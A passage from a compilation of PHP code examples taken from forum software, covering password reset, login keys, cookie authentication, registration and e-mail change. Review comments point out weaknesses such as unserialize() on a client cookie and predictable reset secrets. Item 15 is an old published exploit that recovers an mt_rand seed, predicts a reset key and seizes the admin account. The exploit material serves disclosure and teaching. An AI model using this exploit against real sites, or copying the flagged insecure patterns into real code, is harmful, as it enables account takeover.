        $error_msg[] = "<font color=red><p><i>Email Inesistente nel Forum!</i><p></font>";
    }
}
if ($error_msg) {
    print '<div class="error_msg">
		  <h3 align="center">Errori nella fase di compilazione della form</h2><br />
Esempio n. 10
 /**
  * Handle the "forgotten password" form.
  *
  * For a POST with a valid e-mail address, every user row with that address gets a new
  * password staged in activate_string (hashed with feather_hash()) together with an
  * activation key, and a mail containing the new password and the activation link.
  * The visible code does not change the live password column; that presumably happens
  * when the activation link is followed - confirm against the change_pass handler.
  *
  * @return array Validation errors to show on the form (empty when nothing was posted).
  */
 public function password_forgotten()
 {
     global $lang_common, $lang_login;
     // Logged-in users have no use for this page
     if (!$this->user->is_guest) {
         header('Location: ' . get_base_url());
         exit;
     }
     // Start with a clean slate
     $errors = array();
     if ($this->feather->request()->isPost()) {
         require FEATHER_ROOT . 'include/email.php';
         // Validate the email address
         $email = strtolower(feather_trim($this->request->post('req_email')));
         if (!is_valid_email($email)) {
             $errors[] = $lang_common['Invalid email'];
         }
         // Did everything go according to plan?
         if (empty($errors)) {
             $select_password_forgotten = array('id', 'username', 'last_email_sent');
             $result = DB::for_table('users')->select_many($select_password_forgotten)->where('email', $email)->find_many();
             if ($result) {
                 // Load the "activate password" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/activate_password.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 // Do the generic replacements first (they apply to all emails sent out here)
                 $mail_message = str_replace('<base_url>', get_base_url() . '/', $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 // Loop through users we found
                 foreach ($result as $cur_hit) {
                     // At most one reset mail per account per hour. The check runs per row, so
                     // rows handled earlier in this loop have already been updated and mailed;
                     // message() presumably ends the request - confirm.
                     if ($cur_hit->last_email_sent != '' && time() - $cur_hit->last_email_sent < 3600 && time() - $cur_hit->last_email_sent >= 0) {
                         message(sprintf($lang_login['Email flood'], intval((3600 - (time() - $cur_hit->last_email_sent)) / 60)), true);
                     }
                     // Generate a new password and a new password activation code
                     // NOTE(review): both values are only as unpredictable as random_pass();
                     // confirm it draws from a cryptographic source. The 8-character key is
                     // what authorises the password change.
                     $new_password = random_pass(12);
                     $new_password_key = random_pass(8);
                     $update_password = array('activate_string' => feather_hash($new_password), 'activate_key' => $new_password_key, 'last_email_sent' => time());
                     DB::for_table('users')->where('id', $cur_hit->id)->find_one()->set($update_password)->save();
                     // Do the user specific replacements to the template
                     $cur_mail_message = str_replace('<username>', $cur_hit->username, $mail_message);
                     $cur_mail_message = str_replace('<activation_url>', get_link('user/' . $cur_hit->id . '/action/change_pass/?key=' . $new_password_key), $cur_mail_message);
                     // The new password travels in clear text in the mail body
                     $cur_mail_message = str_replace('<new_password>', $new_password, $cur_mail_message);
                     pun_mail($email, $mail_subject, $cur_mail_message);
                 }
                 message($lang_login['Forget mail'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.', true);
             } else {
                 // NOTE(security): a different response for unknown addresses lets a visitor
                 // test which e-mail addresses are registered. The echoed address is
                 // HTML-escaped.
                 $errors[] = $lang_login['No email match'] . ' ' . htmlspecialchars($email) . '.';
             }
         }
     }
     return $errors;
 }
Esempio n. 11
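/**
 * Generate a login key that no user row holds yet and store it for a user.
 *
 * @param int $uid User to update; the default of 1 selects the current user
 *                 ($panther_user['id']).
 * @return string The key written to users.login_key.
 */
function generate_login_key($uid = 1)
{
    global $db, $panther_user;

    // Draw candidates until one is unused (keys are unique). The previous recursive retry
    // dropped both the recursion's return value and $uid, so a collision returned null and
    // re-keyed the current user instead of $uid.
    // NOTE(review): the key is only as unpredictable as random_pass(); confirm it is backed
    // by random_bytes()/random_int() rather than mt_rand().
    do {
        $key = random_pass(60);
        $ps = $db->select('users', 1, array(':key' => $key), 'login_key=:key');
    } while ($ps->rowCount());

    $data = array(':id' => $uid != 1 ? $uid : $panther_user['id']);
    $update = array('login_key' => $key);
    $db->update('users', $update, 'id=:id', $data);

    return $key;
}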
Esempio n. 12
/**
 * Resolve the current visitor from the authentication cookie.
 *
 * Reads the user id and token from $_COOKIE[$cookie_name], loads the matching
 * user row into $pun_user (passed by reference) and checks the token against
 * md5($cookie_seed . stored password value). On failure, or when no user id
 * above 1 is presented, the visitor is set up as a guest via set_default_user().
 * Also sets the global $tmplang from the request.
 */
function check_cookie(&$pun_user)
{
    # hacked to change interface language without a logged user
    global $db, $pun_config, $cookie_name, $cookie_path, $cookie_seed, $tmplang;
    $now = time();
    $expire = $now + 31536000;
    // The cookie expires after a year
    // We assume it's a guest
    $cookie = array('user_id' => 1, 'password_hash' => 'Invité');
    // If a cookie is set, we get the user_id and password hash from it
    // NOTE(review): unserialize() runs on a client-controlled value before any
    // authenticity check, which exposes the application to PHP object injection
    // through whatever classes are loaded. The regex below already recovers both
    // fields, so a plain delimited or HMAC-signed cookie format would avoid it.
    if (isset($_COOKIE[$cookie_name])) {
        list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
    }
    // Second parse of the same cookie: when the raw text matches a serialized
    // two-string array (digits, lowercase hex), the captures overwrite the
    // unserialize() result. The pattern is not anchored to the whole value.
    if (isset($_COOKIE[$cookie_name]) && preg_match('/a:2:{i:0;s:\\d+:"(\\d+)";i:1;s:\\d+:"([0-9a-f]+)";}/', $_COOKIE[$cookie_name], $matches)) {
        list(, $cookie['user_id'], $cookie['password_hash']) = $matches;
    }
    // NOTE(review): $tmplang is copied verbatim from the query string or a cookie.
    // Its use is outside this function; if it ends up in a path under lang/ it must
    // be checked against the installed language directories first.
    if (isset($_GET['language'])) {
        $tmplang = $_GET['language'];
    } elseif (isset($_COOKIE['language'])) {
        $tmplang = $_COOKIE['language'];
    } else {
        $tmplang = "French";
    }
    if ($cookie['user_id'] > 1) {
        // Check if there's a user with the user ID and password hash from the cookie
        // The only cookie-derived value in this query is the user id, forced to an integer.
        $result = $db->query('SELECT u.*, g.*, o.logged, o.idle FROM ' . $db->prefix . 'users AS u INNER JOIN ' . $db->prefix . 'groups AS g ON u.group_id=g.g_id LEFT JOIN ' . $db->prefix . 'online AS o ON o.user_id=u.id WHERE u.id=' . intval($cookie['user_id'])) or error('Impossible de retrouver les informations utilisateur', __FILE__, __LINE__, $db->error());
        $pun_user = $db->fetch_assoc($result);
        // If user authorisation failed
        // NOTE(review): the expected token is md5(seed . stored password value), so it
        // stays valid until the password changes, and !== is not a constant-time
        // comparison (hash_equals() is, where the PHP version provides it).
        if (!isset($pun_user['id']) || md5($cookie_seed . $pun_user['password']) !== $cookie['password_hash']) {
            // Overwrite the bad cookie with user id 0 and a value from random_pass(8).
            // NOTE(review): that value reaches the client, so it should not come from
            // the same predictable generator as password-reset secrets.
            pun_setcookie(0, random_pass(8), $expire);
            set_default_user();
            return;
        }
        // Set a default language if the user selected language no longer exists
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        // Set a default style if the user selected style no longer exists
        if (!@file_exists(PUN_ROOT . 'style/' . $pun_user['style'] . '.css')) {
            $pun_user['style'] = $pun_config['o_default_style'];
        }
        if (!$pun_user['disp_topics']) {
            $pun_user['disp_topics'] = $pun_config['o_disp_topics_default'];
        }
        if (!$pun_user['disp_posts']) {
            $pun_user['disp_posts'] = $pun_config['o_disp_posts_default'];
        }
        // save_pass == '0' turns the expiry into 0; $expire is not used again in this function.
        if ($pun_user['save_pass'] == '0') {
            $expire = 0;
        }
        // read_topics comes from the users row, not from the request.
        if ($pun_user['read_topics']) {
            $pun_user['read_topics'] = unserialize($pun_user['read_topics']);
        } else {
            $pun_user['read_topics'] = array();
        }
        // Define this if you want this visit to affect the online list and the users last visit data
        if (!defined('PUN_QUIET_VISIT')) {
            // Update the online list
            if (!$pun_user['logged']) {
                // Values interpolated here come from the fetched user row (username escaped) and time().
                $db->query('INSERT INTO ' . $db->prefix . 'online (user_id, ident, logged) SELECT ' . $pun_user['id'] . ', \'' . $db->escape($pun_user['username']) . '\', ' . $now . ' FROM ' . $db->prefix . 'users WHERE id = ' . $pun_user['id'] . ' AND NOT EXISTS (SELECT 1 FROM ' . $db->prefix . 'online WHERE user_id = ' . $pun_user['id'] . ')') or error('Impossible d\'insérer un élément dans la liste des utilisateurs en ligne', __FILE__, __LINE__, $db->error());
            } else {
                // Special case: We've timed out, but no other user has browsed the forums since we timed out
                if ($pun_user['logged'] < $now - $pun_config['o_timeout_visit']) {
                    $db->query('UPDATE ' . $db->prefix . 'users SET last_visit=' . $pun_user['logged'] . ', read_topics=NULL WHERE id=' . $pun_user['id']) or error('Impossible de mettre à jour les données de visite de l\'utilisateur', __FILE__, __LINE__, $db->error());
                    $pun_user['last_visit'] = $pun_user['logged'];
                }
                $idle_sql = $pun_user['idle'] == '1' ? ', idle=0' : '';
                $db->query('UPDATE ' . $db->prefix . 'online SET logged=' . $now . $idle_sql . ' WHERE user_id=' . $pun_user['id']) or error('Impossible de mettre à jour la liste des utilisateurs en ligne', __FILE__, __LINE__, $db->error());
            }
        }
        $pun_user['is_guest'] = false;
    } else {
        // No user id above 1 was presented: treat the visitor as a guest.
        set_default_user();
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        if ($pun_user['read_topics']) {
            $pun_user['read_topics'] = array();
        }
    }
}
Esempio n. 13
 /**
  * Log the visitor out: reset the global user record to a guest and
  * overwrite the FluxBB cookie with user id 1 and a value from random_pass(8).
  */
 function logOff()
 {
     global $pun_user;
     // Replace the record wholesale so no field of the previous session survives.
     $pun_user = array('is_guest' => 1);
     $cookie_value = random_pass(8);
     // One year, in seconds.
     $lifetime = 31536000;
     pun_setcookie(1, $cookie_value, time() + $lifetime);
 }
Esempio n. 14
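     // Excerpt from a password-request handler; the enclosing block opens above this excerpt.
     // Look up every account registered with the submitted address (escaped for SQL).
     $result = $db->query('SELECT id, username FROM ' . $db->prefix . 'users WHERE email=\'' . $db->escape($email) . '\'') or error('Unable to fetch user info', __FILE__, __LINE__, $db->error());
     if ($db->num_rows($result)) {
         // Load the "activate password" template
         $mail_tpl = trim(file_get_contents(PUN_ROOT . 'lang/' . $pun_user['language'] . '/mail_templates/activate_password.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         // Do the generic replacements first (they apply to all e-mails sent out here)
         $mail_message = str_replace('<base_url>', $pun_config['o_base_url'] . '/', $mail_message);
         $mail_message = str_replace('<board_mailer>', $pun_config['o_board_title'] . ' ' . $lang_common['Mailer'], $mail_message);
         // Loop through users we found
         while ($cur_hit = $db->fetch_assoc($result)) {
             // Generate a new password and a new password activation code
             // NOTE(review): both secrets come from random_pass(8). Whoever can predict that
             // generator can take over the account, so confirm it is backed by
             // random_int()/random_bytes() rather than mt_rand(). This excerpt also shows no
             // per-account rate limit on reset mails.
             $new_password = random_pass(8);
             $new_password_key = random_pass(8);
             $db->query('UPDATE ' . $db->prefix . 'users SET activate_string=\'' . pun_hash($new_password) . '\', activate_key=\'' . $new_password_key . '\' WHERE id=' . $cur_hit['id']) or error('Unable to update activation data', __FILE__, __LINE__, $db->error());
             // Do the user specific replacements to the template
             $cur_mail_message = str_replace('<username>', $cur_hit['username'], $mail_message);
             $cur_mail_message = str_replace('<activation_url>', $pun_config['o_base_url'] . '/profile.php?id=' . $cur_hit['id'] . '&action=change_pass&key=' . $new_password_key, $cur_mail_message);
             $cur_mail_message = str_replace('<new_password>', $new_password, $cur_mail_message);
             pun_mail($email, $mail_subject, $cur_mail_message);
         }
         // The address is placed in an attribute and in element text, so escape it for HTML.
         message($lang_login['Forget mail'] . ' <a href="mailto:' . pun_htmlspecialchars($pun_config['o_admin_email']) . '">' . pun_htmlspecialchars($pun_config['o_admin_email']) . '</a>.');
     } else {
         // $email is request data echoed back into the page: escape it before output.
         message($lang_login['No e-mail match'] . ' ' . pun_htmlspecialchars($email) . '.');
     }
 }
 $page_title = pun_htmlspecialchars($pun_config['o_board_title']) . ' / ' . $lang_login['Request pass'];
 $required_fields = array('req_email' => $lang_common['E-mail']);
 $focus_element = array('request_pass', 'req_email');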
Esempio n. 15
// Proof-of-concept driver. SEED, MD5_NOT_LOGGUED, URL and $chars are defined
// outside this excerpt.
// Root cause it demonstrates: the target derives password-reset secrets from
// mt_rand(), a non-cryptographic generator whose whole output stream follows from
// its seed, and the seed space searched here is only 1,000,000 values. A hash the
// server exposes (presumably the one from a not-logged-in cookie) is therefore
// enough to reproduce what the generator yields next.
// Mitigation: generate reset passwords, activation keys and cookie values with
// random_bytes()/random_int(), and never expose output of the same generator
// that produces secrets.
printf("Seed : %s\n--\n", SEED);
// Try each candidate seed until the recomputed hash equals the observed one.
for ($p = 0; $p < 1000000; $p++) {
    // Progress indicator only.
    if (!($p % 300)) {
        echo $chars[$p / 300 % 4] . "\r";
    }
    mt_srand((double) $p);
    if (strcmp(md5(SEED . random_pass(8)), MD5_NOT_LOGGUED) == 0) {
        define('SRAND', $p);
        break;
    }
}
printf("SRAND : %s\n--\n", SRAND);
// Replay the generator from the recovered seed; the first draw is discarded.
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL . '/profile.php?id=2&action=change_pass&key=' . random_pass(8);
// Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
/**
 * Build a string of $len characters drawn from A-Z, a-z and 0-9 using mt_rand().
 *
 * mt_rand() is not a cryptographic generator: after mt_srand($seed) the output
 * is fully reproducible, which is the property this listing relies on. Code
 * that issues real passwords or tokens should use random_int()/random_bytes().
 *
 * @param int $len Number of characters to produce.
 * @return string The generated string.
 */
function random_pass($len)
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $alphabet_size = strlen($alphabet);
    $out = '';
    // One mt_rand() draw per character, reduced modulo the alphabet size.
    while (strlen($out) < $len) {
        $out .= $alphabet[mt_rand() % $alphabet_size];
    }
    return $out;
}
# milw0rm.com [2008-02-21]
Esempio n. 16
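// Registration form handler (excerpt; the if-block below continues past the end of this listing).
$errors = array();
if (isset($_POST['form_sent'])) {
    // Check that someone from this IP didn't register a user within the last hour (DoS prevention)
    $query = $db->select(array('one' => '1'), 'users AS u');
    $query->where = 'u.registration_ip = :remote_addr AND u.registered > :last_hour';
    $params = array(':remote_addr' => get_remote_address(), ':last_hour' => time() - 3600);
    $result = $query->run($params);
    if (!empty($result)) {
        message($lang->t('Registration flood'));
    }
    unset($result, $query, $params);
    // NOTE(review): the req_* fields are read without isset(), so a request that omits
    // one raises a notice instead of a validation error.
    $username = pun_trim($_POST['req_user']);
    $email1 = strtolower(trim($_POST['req_email1']));
    if ($pun_config['o_regs_verify'] == '1') {
        // With e-mail verification on, the user does not choose the first password.
        // NOTE(review): this initial password is only as unpredictable as random_pass();
        // confirm that helper uses random_int()/random_bytes() rather than mt_rand().
        $email2 = strtolower(trim($_POST['req_email2']));
        $password1 = random_pass(8);
        $password2 = $password1;
    } else {
        $password1 = pun_trim($_POST['req_password1']);
        $password2 = pun_trim($_POST['req_password2']);
    }
    // Validate username and passwords
    check_username($username);
    // NOTE(review): a four-character minimum is very weak by current guidance.
    if (pun_strlen($password1) < 4) {
        $errors[] = $lang->t('Pass too short');
    } elseif ($password1 !== $password2) {
        // Strict comparison: with != two numeric-looking strings such as "1e3" and
        // "1000" compare equal, so a mistyped confirmation could go unnoticed.
        $errors[] = $lang->t('Pass not match');
    }
    // Validate email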
Esempio n. 17
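 /**
  * Handle an e-mail address change for user $id.
  *
  * With a "key" query parameter, confirms a pending change by comparing the key
  * with users.activate_key and moving activate_string into email. On POST,
  * verifies the current password, validates the new address, stores it as a
  * pending change with a fresh key and mails the activation link to it.
  *
  * NOTE(review): the flow appears to rely on message() ending the request after
  * each permission or validation failure; confirm against its definition.
  *
  * @param int $id Id of the user whose address is being changed.
  */
 public function change_email($id)
 {
     global $lang_profile, $lang_common, $lang_prof_reg;
     // Make sure we are allowed to change this user's email
     if ($this->user->id != $id) {
         if (!$this->user->is_admmod) {
             // A regular user trying to change another user's email?
             message($lang_common['No permission'], '403');
         } elseif ($this->user->g_moderator == '1') {
             // A moderator trying to change a user's email?
             $select_change_mail = array('u.group_id', 'g.g_moderator');
             $user = DB::for_table('users')->table_alias('u')->select_many($select_change_mail)->inner_join('groups', array('g.g_id', '=', 'u.group_id'), 'g')->where('u.id', $id)->find_one();
             if (!$user) {
                 message($lang_common['Bad request'], '404');
             }
             // Moderators may not touch administrators or other moderators.
             if ($this->user->g_mod_edit_users == '0' || $this->user->g_mod_change_passwords == '0' || $user['group_id'] == FEATHER_ADMIN || $user['g_moderator'] == '1') {
                 message($lang_common['No permission'], '403');
             }
         }
     }
     if ($this->request->get('key')) {
         $key = $this->request->get('key');
         $new_email_key = DB::for_table('users')->where('id', $id)->find_one_col('activate_key');
         // Compare as strings. With == / != two numeric-looking keys ("1e3" and "1000")
         // compare equal, and an account with no pending change must never match.
         $stored_key = (string) $new_email_key;
         if (!is_string($key) || $key === '' || $stored_key === '') {
             $key_matches = false;
         } elseif (function_exists('hash_equals')) {
             // Constant-time comparison where the PHP version provides it.
             $key_matches = hash_equals($stored_key, $key);
         } else {
             $key_matches = $stored_key === $key;
         }
         if (!$key_matches) {
             message($lang_profile['Email key bad'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.');
         } else {
             // Promote the pending address and clear the activation data so the key cannot be reused.
             DB::for_table('users')->where('id', $id)->find_one()->set_expr('email', 'activate_string')->set_expr('activate_string', 'NULL')->set_expr('activate_key', 'NULL')->save();
             message($lang_profile['Email updated'], true);
         }
     } elseif ($this->request->isPost()) {
         // Re-authenticate with the acting user's current password before changing anything.
         if (feather_hash($this->request->post('req_password')) !== $this->user->password) {
             message($lang_profile['Wrong pass']);
         }
         require FEATHER_ROOT . 'include/email.php';
         // Validate the email address
         $new_email = strtolower(feather_trim($this->request->post('req_new_email')));
         if (!is_valid_email($new_email)) {
             message($lang_common['Invalid email']);
         }
         // Check if it's a banned email address
         if (is_banned_email($new_email)) {
             if ($this->config['p_allow_banned_email'] == '0') {
                 message($lang_prof_reg['Banned email']);
             } elseif ($this->config['o_mailing_list'] != '') {
                 // Load the "banned email change" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/banned_email_change.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 $mail_message = str_replace('<username>', $this->user->username, $mail_message);
                 $mail_message = str_replace('<email>', $new_email, $mail_message);
                 $mail_message = str_replace('<profile_url>', get_link('user/' . $id . '/'), $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 pun_mail($this->config['o_mailing_list'], $mail_subject, $mail_message);
             }
         }
         // Check if someone else already has registered with that email address
         $select_change_mail = array('id', 'username');
         $result = DB::for_table('users')->select_many($select_change_mail)->where('email', $new_email)->find_many();
         if ($result) {
             if ($this->config['p_allow_dupe_email'] == '0') {
                 message($lang_prof_reg['Dupe email']);
             } elseif ($this->config['o_mailing_list'] != '') {
                 $dupe_list = array();
                 foreach ($result as $cur_dupe) {
                     $dupe_list[] = $cur_dupe['username'];
                 }
                 // Load the "dupe email change" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/dupe_email_change.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 $mail_message = str_replace('<username>', $this->user->username, $mail_message);
                 $mail_message = str_replace('<dupe_list>', implode(', ', $dupe_list), $mail_message);
                 $mail_message = str_replace('<profile_url>', get_link('user/' . $id . '/'), $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 pun_mail($this->config['o_mailing_list'], $mail_subject, $mail_message);
             }
         }
         // NOTE(review): the activation key gates the address change, so it is only as strong
         // as random_pass(); confirm that helper uses random_int()/random_bytes(), not mt_rand().
         $new_email_key = random_pass(8);
         // Update the user
         $update_user = array('activate_string' => $new_email, 'activate_key' => $new_email_key);
         // Was where('id', tid): a bare word instead of $id, so no row matched and the
         // pending change was never stored.
         DB::for_table('users')->where('id', $id)->find_one()->set($update_user)->save();
         // Load the "activate email" template
         $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/activate_email.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         $mail_message = str_replace('<username>', $this->user->username, $mail_message);
         $mail_message = str_replace('<base_url>', get_base_url(), $mail_message);
         $mail_message = str_replace('<activation_url>', get_link('user/' . $id . '/action/change_email/?key=' . $new_email_key), $mail_message);
         $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
         // The link goes to the NEW address, so only someone who controls it can confirm.
         pun_mail($new_email, $mail_subject, $mail_message);
         message($lang_profile['Activate email sent'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.', true);
     }
 }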